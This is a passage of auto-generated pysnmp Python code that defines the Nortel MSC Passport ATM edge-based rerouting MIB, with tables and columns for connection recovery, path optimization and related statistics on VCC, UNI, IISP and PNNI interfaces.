3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), 
(\"yes\", 1))).clone('yes')).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12))\nmscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1), )\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30), )\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1), ).setIndexNames((0, 
\"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues((\"no\", 0), (\"yes\", 1)))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40), )\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVccIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVccEbrInfoIndex\"))\nif mibBuilder.loadTexts: 
mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))\nmscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrRowStatus.setStatus('mandatory')\nmscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrComponentName.setStatus('mandatory')\nmscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrStorageType.setStatus('mandatory')\nmscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: 
mscAtmIfUniEbrIndex.setStatus('mandatory')\nmscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrProvTable.setStatus('mandatory')\nmscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrProvEntry.setStatus('mandatory')\nmscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrPathOptimization.setStatus('mandatory')\nmscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrOperTable.setStatus('mandatory')\nmscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrOperEntry.setStatus('mandatory')\nmscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif 
mibBuilder.loadTexts: mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfUniEbrStatsTable.setStatus('mandatory')\nmscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmUniMIB\", \"mscAtmIfUniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfUniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfUniEbrStatsEntry.setStatus('mandatory')\nmscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))\nmscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1), )\nif mibBuilder.loadTexts: 
mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrRowStatus.setStatus('mandatory')\nmscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrComponentName.setStatus('mandatory')\nmscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrStorageType.setStatus('mandatory')\nmscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfIispEbrIndex.setStatus('mandatory')\nmscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrProvTable.setStatus('mandatory')\nmscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrProvEntry.setStatus('mandatory')\nmscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), 
OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrPathOptimization.setStatus('mandatory')\nmscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrOperTable.setStatus('mandatory')\nmscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrOperEntry.setStatus('mandatory')\nmscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: 
mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfIispEbrStatsTable.setStatus('mandatory')\nmscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfIispEbrStatsEntry.setStatus('mandatory')\nmscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))\nmscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), 
RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrComponentName.setStatus('mandatory')\nmscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrStorageType.setStatus('mandatory')\nmscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrIndex.setStatus('mandatory')\nmscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrProvTable.setStatus('mandatory')\nmscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')\nmscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 
1)).setFixedLength(1).clone(hexValue=\"c0\")).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')\nmscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrOperTable.setStatus('mandatory')\nmscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')\nmscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40), )\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')\nmscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 
2, 1, 114, 9, 6, 7, 40, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmIispMIB\", \"mscAtmIfVptIispIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptIispEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')\nmscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))\nmscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", \"mscAtmIfVptIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmPnniMIB\", \"mscAtmIfVptPnniIndex\"), (0, \"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", \"mscAtmIfVptPnniEbrIndex\"))\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')\nmscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess(\"readwrite\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')\nmscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 
7, 1, 1, 2), DisplayString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')\nmscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')\nmscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrIndex.setStatus('mandatory')\nmscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20), )\nif mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')\nmscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1), ).setIndexNames((0, \"Nortel-MsCarrier-MscPassport-AtmCoreMIB\", 